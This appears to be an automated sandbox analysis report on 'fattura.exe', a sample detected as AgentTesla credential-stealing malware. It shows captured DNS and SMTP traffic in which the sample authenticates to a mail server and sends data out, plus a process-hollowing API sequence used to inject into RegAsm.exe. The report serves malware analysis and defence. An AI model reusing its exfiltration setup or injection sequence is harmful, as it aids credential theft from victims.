Nov 20, 2020 12:37:55.446657896 CET	8.8.8.8	192.168.2.4	0xd81d	No error (0)	greatdeck.co		162.222.226.70	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 20, 2020 12:37:55.984190941 CET	587	49767	162.222.226.70	192.168.2.4	220-bh-37.webhostbox.net ESMTP Exim 4.93 #2 Fri, 20 Nov 2020 11:37:55 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 20, 2020 12:37:55.984671116 CET	49767	587	192.168.2.4	162.222.226.70	EHLO 813848
Nov 20, 2020 12:37:56.124622107 CET	587	49767	162.222.226.70	192.168.2.4	250-bh-37.webhostbox.net Hello 813848 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 20, 2020 12:37:56.125966072 CET	49767	587	192.168.2.4	162.222.226.70	AUTH login aW5mby5ncmVhdGRlY2tAZ3JlYXRkZWNrLmNv
Nov 20, 2020 12:37:56.265924931 CET	587	49767	162.222.226.70	192.168.2.4	334 UGFzc3dvcmQ6
Nov 20, 2020 12:37:56.408432961 CET	587	49767	162.222.226.70	192.168.2.4	235 Authentication succeeded
Nov 20, 2020 12:37:56.409766912 CET	49767	587	192.168.2.4	162.222.226.70	MAIL FROM:<info.greatdeck@greatdeck.co>
Nov 20, 2020 12:37:56.549482107 CET	587	49767	162.222.226.70	192.168.2.4	250 OK
Nov 20, 2020 12:37:56.550213099 CET	49767	587	192.168.2.4	162.222.226.70	RCPT TO:<info.greatdeck@greatdeck.co>
Nov 20, 2020 12:37:56.693073988 CET	587	49767	162.222.226.70	192.168.2.4	250 Accepted
Nov 20, 2020 12:37:56.693809032 CET	49767	587	192.168.2.4	162.222.226.70	DATA
Nov 20, 2020 12:37:56.834531069 CET	587	49767	162.222.226.70	192.168.2.4	354 Enter message, ending with "." on a line by itself
Nov 20, 2020 12:37:56.844362974 CET	49767	587	192.168.2.4	162.222.226.70	.
Nov 20, 2020 12:37:56.988037109 CET	587	49767	162.222.226.70	192.168.2.4	250 OK id=1kg4jk-000fJo-Os

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: fattura.exe PID: 3984 Parent PID: 5820

General

Start time:	12:36:16
Start date:	20/11/2020
Path:	C:\Users\user\Desktop\fattura.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\fattura.exe'
Imagebase:	0xb00000
File size:	618496 bytes
MD5 hash:	AC16B512E9DE9308FA69B78AF1FAED07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.667877836.0000000004B03000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.669949286.00000000057F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.669771908.0000000005512000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 2456 Parent PID: 3984

General

Start time:	12:36:21
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x330000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegAsm.exe PID: 864 Parent PID: 3984

General

Start time:	12:36:21
Start date:	20/11/2020
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x650000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: fattura.exe PID: 3984 Parent PID: 5820 fattura.exeCOMMON

Executed Functions

Function 055001CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON

Download Yara Rule

Strings

enPr, xrefs: 05500D7A
tCon, xrefs: 05500A0E
tCre, xrefs: 055006B0
sW, xrefs: 0550113C
sour, xrefs: 0550023C
Ex, xrefs: 05501215
Reso, xrefs: 055001E7
eate, xrefs: 05500C05
texW, xrefs: 05501360
cess, xrefs: 05500E01
le32, xrefs: 055005BB
yste, xrefs: 0550036D
enFi, xrefs: 05500BBB
tDes, xrefs: 0550077E
NtSe, xrefs: 05500BD4
Begi, xrefs: 055011D4
ion, xrefs: 05500AC7
orma, xrefs: 055002A1
xecu, xrefs: 05500CBA
ease, xrefs: 055007B0
adEx, xrefs: 05500D0B
Tran, xrefs: 05500E7A
ss, xrefs: 05500F6E
Thre, xrefs: 055009EB
extW, xrefs: 05500696
Thre, xrefs: 05500D01
rThr, xrefs: 05500D5C
ory, xrefs: 055002ED
layE, xrefs: 05500CB0
wnDl, xrefs: 0550125C
enMu, xrefs: 055012E7
tVal, xrefs: 05500BDE
et, xrefs: 05500C9D
rs, xrefs: 05500E1F
fSec, xrefs: 055009BD
ddre, xrefs: 05500F64
rocA, xrefs: 05500822
ateH, xrefs: 055006BA
NtOp, xrefs: 05500E98
eUse, xrefs: 05500E42
l, xrefs: 0550046D
cess, xrefs: 05500E56
ile, xrefs: 05500C33
CoCr, xrefs: 05501224
Crea, xrefs: 0550134C
Cryp, xrefs: 055006CE
NtCr, xrefs: 055012B0
ster, xrefs: 05501128
ddre, xrefs: 0550082C
on, xrefs: 055010C4
oces, xrefs: 055008F0
sW, xrefs: 055008FA
py, xrefs: 05500665
wcsc, xrefs: 05500C83
ateK, xrefs: 05500645
Proc, xrefs: 05501078
NtCo, xrefs: 05500D1B
tant, xrefs: 055012F1
just, xrefs: 05500DB1
NtSe, xrefs: 05500A04
tRel, xrefs: 055007A6
tion, xrefs: 055002AB
nfor, xrefs: 05500332
NtOp, xrefs: 055012DD
r32., xrefs: 0550049E
ash, xrefs: 055006C4
Key, xrefs: 05500792
.dll, xrefs: 055005C5
le, xrefs: 05500BA2
Inst, xrefs: 05501238
dll, xrefs: 055004A8
\Kno, xrefs: 05500562
viro, xrefs: 05500AE5
age, xrefs: 05501196
mory, xrefs: 0550098F
umer, xrefs: 0550063B
lMem, xrefs: 055007EC
mems, xrefs: 05500C93
nmen, xrefs: 05500AEF
Expa, xrefs: 05500AD1
i32., xrefs: 05500512
tCur, xrefs: 05500C51
otec, xrefs: 05500881
Thre, xrefs: 05500A22
RtlZ, xrefs: 05500909
Priv, xrefs: 05500DBB
le, xrefs: 05500BC5
wOfS, xrefs: 05500A86
KERNEL32.DLL, xrefs: 05501392, 05501398
NtAl, xrefs: 055002BB
onFi, xrefs: 05500B75
sact, xrefs: 05500E84
Size, xrefs: 05500228
rren, xrefs: 05500ED3
le, xrefs: 05500B7F
Reso, xrefs: 055008C2
kernel32.dll, xrefs: 0550137C, 0550137F
mInf, xrefs: 05500297
ance, xrefs: 05501242
\ntd, xrefs: 055003C9
\Kno, xrefs: 05501252
sTok, xrefs: 05500D8E
ce, xrefs: 05500246
ory, xrefs: 0550102C
wcsc, xrefs: 05500FA0
NtCr, xrefs: 05500AA9
eryV, xrefs: 05500613
tDer, xrefs: 055006FF
roce, xrefs: 0550094E
ureA, xrefs: 05500F5A
ow, xrefs: 055010E7
ageB, xrefs: 05500FC3
eate, xrefs: 05500E70
ser3, xrefs: 05500580
ings, xrefs: 05500B03
orma, xrefs: 05500C47
ecti, xrefs: 05500A90
lize, xrefs: 0550120B
ess, xrefs: 05501082
GetM, xrefs: 05500B16
enPr, xrefs: 05500301
W, xrefs: 05500B0D
dll, xrefs: 05500558
NtOp, xrefs: 055002F7
iteF, xrefs: 05500C29
o, xrefs: 05500381
rent, xrefs: 05500C5B
mInf, xrefs: 05500377
eate, xrefs: 05500AB3
NtCr, xrefs: 05500BFB
wcsl, xrefs: 05500CD4
2.dl, xrefs: 0550129D
Load, xrefs: 05500204
ls\n, xrefs: 055004C6
ll, xrefs: 05501284
oced, xrefs: 05500F50
Cont, xrefs: 0550068C
at, xrefs: 05500C8A
dvap, xrefs: 05500508
text, xrefs: 05500A18
indo, xrefs: 05501155
Regi, xrefs: 0550111E
aryA, xrefs: 0550080E
ndow, xrefs: 0550110A
RtlC, xrefs: 05500E2E
Fill, xrefs: 055011BA
lstr, xrefs: 0550085D
ls32, xrefs: 055003BF
eryI, xrefs: 05500B57
ory, xrefs: 055007F6
NtRe, xrefs: 055009D7
NtCl, xrefs: 05501036
ZwUn, xrefs: 0550099F
DefW, xrefs: 0550114B
rypt, xrefs: 05500764
tStr, xrefs: 05500AF9
oces, xrefs: 05500350
\Kno, xrefs: 0550059D
\use, xrefs: 05500494
Cryp, xrefs: 055006F5
\Ole, xrefs: 05501270
NtTe, xrefs: 05500930
Para, xrefs: 05500E0B
reat, xrefs: 05500E38
rmin, xrefs: 0550093A
Post, xrefs: 05501178
Hash, xrefs: 05500740
tCon, xrefs: 05500A45
adFi, xrefs: 05500B98
tDes, xrefs: 0550072C
Key, xrefs: 05500627
Cryp, xrefs: 0550066E
NtAd, xrefs: 05500DA7
Muta, xrefs: 055012C4
\Kno, xrefs: 055004B2
itia, xrefs: 05501201
memc, xrefs: 0550065E
\adv, xrefs: 0550040A
ZwRo, xrefs: 05500F01
etCu, xrefs: 05500EC9
File, xrefs: 05500C0F
cW, xrefs: 05501169
Cryp, xrefs: 05500774
y, xrefs: 05500BF2
iveK, xrefs: 05500709
oadD, xrefs: 05500F87
tDec, xrefs: 0550075A
NtOp, xrefs: 05500BB1
ad, xrefs: 055009F5
Free, xrefs: 055008B8
teVi, xrefs: 055002CF
nsac, xrefs: 05500EE7
urce, xrefs: 055001F1
ntin, xrefs: 05500D25
lenW, xrefs: 05500867
NtDe, xrefs: 05500CA6
mp, xrefs: 05500FAA
Find, xrefs: 055001DD
wnDl, xrefs: 055005A7
NtCr, xrefs: 05500CED
eryI, xrefs: 05500328
nt, xrefs: 055012CE
emor, xrefs: 0550091D
iteV, xrefs: 05500971
Memo, xrefs: 0550089F
ath, xrefs: 05500C79
roce, xrefs: 05500FEB
troy, xrefs: 05500788
wnDl, xrefs: 055004BC
wcst, xrefs: 0550108C
ue, xrefs: 05500D2F
ead, xrefs: 05500D66
Cryp, xrefs: 05500722
\Kno, xrefs: 05500431
ecti, xrefs: 055010BA
tVir, xrefs: 0550088B
urce, xrefs: 05500218
reat, xrefs: 05500D48
l, xrefs: 05500594
NtQu, xrefs: 05500609
yste, xrefs: 0550028D
pVie, xrefs: 05500A7C
ueKe, xrefs: 05500BE8
ad, xrefs: 05500A2C
ey, xrefs: 0550064F
\Kno, xrefs: 055003EC
urce, xrefs: 055008CC
nt, xrefs: 055011E8
urce, xrefs: 05500269
nPai, xrefs: 055011DE
Show, xrefs: 055010D3
User, xrefs: 0550106E
wnDl, xrefs: 055003B5
aint, xrefs: 055011AA
2.dl, xrefs: 0550041E
eFil, xrefs: 05500B2A
oces, xrefs: 0550030B
KeyP, xrefs: 05500C6F
Reso, xrefs: 0550025F
Wind, xrefs: 055010DD
s, xrefs: 0550035A
Crea, xrefs: 055010F6
ss, xrefs: 05500FF5
mati, xrefs: 05500B6B
Cryp, xrefs: 0550079C
ey, xrefs: 05500713
2.dl, xrefs: 0550058A
en, xrefs: 05500D98
Rect, xrefs: 055011C4
a, xrefs: 055006EC
NtQu, xrefs: 0550031E
reat, xrefs: 05500DED
eroM, xrefs: 05500913
eA, xrefs: 05500B3E
NtOp, xrefs: 055005EC
GetP, xrefs: 05500818
llba, xrefs: 05500F0B
ls\k, xrefs: 0550053A
tdll, xrefs: 055004D0
enSe, xrefs: 05500EA2
l, xrefs: 055012A7
2.dl, xrefs: 05500463
NtQu, xrefs: 055010A6
y, xrefs: 05500927
eate, xrefs: 05500CF7
ss, xrefs: 05500958
ls\a, xrefs: 055004FE
NtQu, xrefs: 05500B4D
ndEn, xrefs: 05500ADB
\Kno, xrefs: 05500526
NtPr, xrefs: 05500877
NtRe, xrefs: 055007CE
alMe, xrefs: 05500985
LdrG, xrefs: 05500F3C
Load, xrefs: 05500800
etPr, xrefs: 05500F46
ls\u, xrefs: 05500576
rtua, xrefs: 055007E2
Mess, xrefs: 05500FB9
adVi, xrefs: 055007D8
n, xrefs: 05500EB6
wnDl, xrefs: 05500530
oces, xrefs: 05500D84
wnDl, xrefs: 0550056C
oxA, xrefs: 05500FCD
LdrL, xrefs: 05500F7D
mete, xrefs: 05500E15
eNam, xrefs: 05500B34
ll, xrefs: 05500F91
NtMa, xrefs: 05500A72
hDat, xrefs: 055006E2
mati, xrefs: 0550033C
NtWr, xrefs: 05500967
Sect, xrefs: 05500ABD
ll, xrefs: 055003DD
wnDl, xrefs: 055003F6
ls\O, xrefs: 055005B1
ileg, xrefs: 05500DC5
NtWr, xrefs: 05500C1F
Cryp, xrefs: 055006A6
\Kno, xrefs: 055004EA
alue, xrefs: 0550061D
iewO, xrefs: 055009B3
RtlF, xrefs: 05500C3D
mbstowcs, xrefs: 05501371, 05501374
on, xrefs: 05500A9A
eate, xrefs: 0550122E
rtua, xrefs: 05501018
ckTr, xrefs: 05500F15
ext, xrefs: 055007C4
onPr, xrefs: 05500346
ZwCr, xrefs: 05500E66
\Kno, xrefs: 05500476
tion, xrefs: 055009C7
ls32, xrefs: 05500445
ctio, xrefs: 05500F29
uire, xrefs: 05500682
Thre, xrefs: 05500A59
.dll, xrefs: 05500853
nel3, xrefs: 05500459
ansa, xrefs: 05500F1F
\ker, xrefs: 0550044F
teMu, xrefs: 05501356
s, xrefs: 05500315
CoIn, xrefs: 055011F7
NtCr, xrefs: 0550105A
ls32, xrefs: 0550048A
Cryp, xrefs: 05500750
wnDl, xrefs: 0550043B
troy, xrefs: 05500736
lMem, xrefs: 055002E3
User, xrefs: 05500C65
NtFr, xrefs: 05501004
ll.d, xrefs: 055003D3
api3, xrefs: 05500414
Reso, xrefs: 0550020E
NtQu, xrefs: 05500279
rPro, xrefs: 05500E4C
ombs, xrefs: 05501096
eate, xrefs: 05501064
sume, xrefs: 055009E1
esTo, xrefs: 05500DCF
ctio, xrefs: 05500EAC
erne, xrefs: 05500544
ad, xrefs: 05500A63
Cont, xrefs: 055007BA
Crea, xrefs: 055008DC
eate, xrefs: 055012BA
wPro, xrefs: 0550115F
tTra, xrefs: 05500EDD
loca, xrefs: 055002C5
l32., xrefs: 0550054E
ls32, xrefs: 05501266
wcsc, xrefs: 0550104A
l, xrefs: 05500428
.dll, xrefs: 055004DA
W, xrefs: 055001FB
RtlS, xrefs: 05500EBF
32.d, xrefs: 0550127A
ss, xrefs: 05500836
ry, xrefs: 055008A9
w64P, xrefs: 05500FE1
NtGe, xrefs: 05500A3B
tion, xrefs: 05500EF1
eUse, xrefs: 05500D52
Quit, xrefs: 05501182
ken, xrefs: 05500DD9
tHas, xrefs: 055006D8
wnDl, xrefs: 05500480
Ole3, xrefs: 05501293
Libr, xrefs: 05500807
tual, xrefs: 05500895
EndP, xrefs: 055011A0
Lock, xrefs: 05500255
en, xrefs: 05500CDE
enKe, xrefs: 055005F6
text, xrefs: 05500A4F
ose, xrefs: 05501040
mapV, xrefs: 055009A9
NtRe, xrefs: 05500B8E
eeVi, xrefs: 0550100E
lMem, xrefs: 05501022
wnDl, xrefs: 055004F4
n, xrefs: 05500F33
odul, xrefs: 05500B20
eryS, xrefs: 05500283
RtlC, xrefs: 05500DE3
py, xrefs: 05501051
ion, xrefs: 05500E8E
GetS, xrefs: 05500363
\Kno, xrefs: 055003AB
dll, xrefs: 0550051C
tAcq, xrefs: 05500678
tion, xrefs: 05500CC4
IsWo, xrefs: 05500FD7
teWi, xrefs: 05501100
tePr, xrefs: 055008E6
rtua, xrefs: 055002D9
nfor, xrefs: 05500B61
ExW, xrefs: 05501114
ls32, xrefs: 05500400
y, xrefs: 05500600
ofRe, xrefs: 05500232
NtOp, xrefs: 05500D70
eryS, xrefs: 055010B0
strlenuser32.dlladvapi32.dll, xrefs: 05501348, 0550134B
ateP, xrefs: 05500944
Mess, xrefs: 0550118C
NtEn, xrefs: 05500631
ePro, xrefs: 05500DF7
irtu, xrefs: 0550097B
Clas, xrefs: 05501132
RtlC, xrefs: 05500D3E

Memory Dump Source

Source File: 00000000.00000002.669743112.0000000005500000.00000040.00000001.sdmp, Offset: 05500000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
API String ID: 2380476227-789266925
Opcode ID: c194c161092c18b131e039ca3b66cc3a3cccb98f9a19bdd52842cff60dc8cd3f
Instruction ID: 5d2c78cc49f0177ad8d67ce01dde049efb3a3fd9b0de375ab38227b62d25a68f
Opcode Fuzzy Hash: c194c161092c18b131e039ca3b66cc3a3cccb98f9a19bdd52842cff60dc8cd3f
Instruction Fuzzy Hash: D8D2D0B1C0526D8ACF21DFA18D89BCEBBB8BF55300F5091DAD148AB255EB309B84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 05501C09, Relevance: 18.2, APIs: 12, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 05501CB7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05501CDC
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05501CF6
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 05501D41
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05501D66
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05501DA9
NtTerminateProcess.NTDLL(?,00000000), ref: 05501DB7
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 05501DC2
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 05501E36
NtGetContextThread.NTDLL(?,?), ref: 05501E50
NtSetContextThread.NTDLL(?,00010007), ref: 05501E74
NtResumeThread.NTDLL(?,00000000), ref: 05501E86

Memory Dump Source

Source File: 00000000.00000002.669743112.0000000005500000.00000040.00000001.sdmp, Offset: 05500000, based on PE: false

Similarity

API ID: Section$ProcessThreadView$ContextCreateMemoryVirtual$InformationQueryReadResumeTerminateUnmapWrite
String ID:
API String ID: 3848664822-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: 9d05b308c75015fe898d9312ad1f951e3f98e35d2adf74d0278bd8b5fe50c2e2
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: 6591E372900649AFDF21DFA5CC89EEEBBB8FF49705F004059FA09EA150D731AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 055000AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 05500199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 055001B8

Strings

NtMapViewOfSectionNtOpenSection, xrefs: 05500128, 0550012B
en, xrefs: 05500150
NtOpenSection, xrefs: 0550011D, 05500120
wcsl, xrefs: 05500149
@, xrefs: 0550018C

Memory Dump Source

Source File: 00000000.00000002.669743112.0000000005500000.00000040.00000001.sdmp, Offset: 05500000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: b9967f45933bd621db42a5e90bf6e70a36816c9e03554ebcaaad6bc9dafc6097
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: D53104B1E00259ABCB10DFE4D985BDEBBB8FF08754F10415AE514EB290E774AA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DE9278, Relevance: 1.5, APIs: 1, Instructions: 241memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02DE9500

Memory Dump Source

Source File: 00000000.00000002.665625917.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7f23ad997db36ed03637b5eb732cd15847c9c87669cd37062312a7aeb898c84c
Instruction ID: 28d5cc8c98ec4c578a552e4ade0a623a73666261b881e2920478ff291c7e3525
Opcode Fuzzy Hash: 7f23ad997db36ed03637b5eb732cd15847c9c87669cd37062312a7aeb898c84c
Instruction Fuzzy Hash: AE8100717002158FCB10EBB9C894BAFBBF5AF89314F148569E54A9B391CB34DC41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02DE9498, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02DE9500

Memory Dump Source

Source File: 00000000.00000002.665625917.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: def34bc97260a273fa496dc32f435d6637fb37eb9caba77fbb2312686732416c
Instruction ID: 57a62146c27ae6d77c5e41b4a3360bf16bd42abf5d287e4f51b936cf9dc24e5b
Opcode Fuzzy Hash: def34bc97260a273fa496dc32f435d6637fb37eb9caba77fbb2312686732416c
Instruction Fuzzy Hash: FB1110B19002489FCB10DF9AC884BDEBBF8FB88324F10841AE569A7310C775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0146D0EC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.665560807.000000000146D000.00000040.00000001.sdmp, Offset: 0146D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0dd21f13fba27635965bcaa54063898ca6d5f205dfcd455b41be9d960d59e3
Instruction ID: 36d826121460e18593baa2a96038368e64d5ac90ff2e8e7c6cb9751091dd177f
Opcode Fuzzy Hash: 2f0dd21f13fba27635965bcaa54063898ca6d5f205dfcd455b41be9d960d59e3
Instruction Fuzzy Hash: 5A2137B1B04240EFDB01CF54D8C0B66BB69FB88318F24C56ED8494B356C7B6D846CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 0146D0E7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.665560807.000000000146D000.00000040.00000001.sdmp, Offset: 0146D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction ID: 1986811f0f333fac3b1025c32f31710f394d113b2d30e80d502a056de069f3ae
Opcode Fuzzy Hash: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction Fuzzy Hash: 10119075904280DFDB02CF54D9C4B56BF71FB84318F28C6AAD8494B766C37AD44ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0145D041, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.665546321.000000000145D000.00000040.00000001.sdmp, Offset: 0145D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b247a8b64d13a1b090ec6e191934d7afdda2b825dfe35a13bb98634a4170acf
Instruction ID: 33ed068987220093011e7f78599e91f618ce28724da455e63483ef62eda555f5
Opcode Fuzzy Hash: 0b247a8b64d13a1b090ec6e191934d7afdda2b825dfe35a13bb98634a4170acf
Instruction Fuzzy Hash: 5F01FCB18083409BE7504B55CC80767BBD8DF45A6CF08851BED041B357C3759846C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0145D040, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.665546321.000000000145D000.00000040.00000001.sdmp, Offset: 0145D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56e64384b93c02e78ac84e0564f379f04eec9c9424f59202a4e81692eba93f7
Instruction ID: df95f9674ce9da686ff597dc8c01c65f05f985060c8671bcfb4831c69bb7ee5c
Opcode Fuzzy Hash: d56e64384b93c02e78ac84e0564f379f04eec9c9424f59202a4e81692eba93f7
Instruction Fuzzy Hash: FAF062B14082849BEB518B1ACC84B63FFE8EF41678F18C45AED085B397C3799845CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B8F419, Relevance: .6, Instructions: 625
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00B8F419(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, intOrPtr* __edi, void* __esi) {
				signed char _t313;
				void* _t315;
				signed int _t316;
				signed char _t317;
				signed int _t319;
				signed int _t321;
				signed int _t332;
				void* _t333;
				signed int _t338;
				signed char _t342;
				signed char _t343;
				intOrPtr* _t344;
				signed int _t345;
				signed int _t346;
				intOrPtr* _t347;
				intOrPtr* _t348;
				signed int _t349;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				intOrPtr* _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed char _t370;
				signed char _t371;
				signed char _t374;
				signed char _t375;
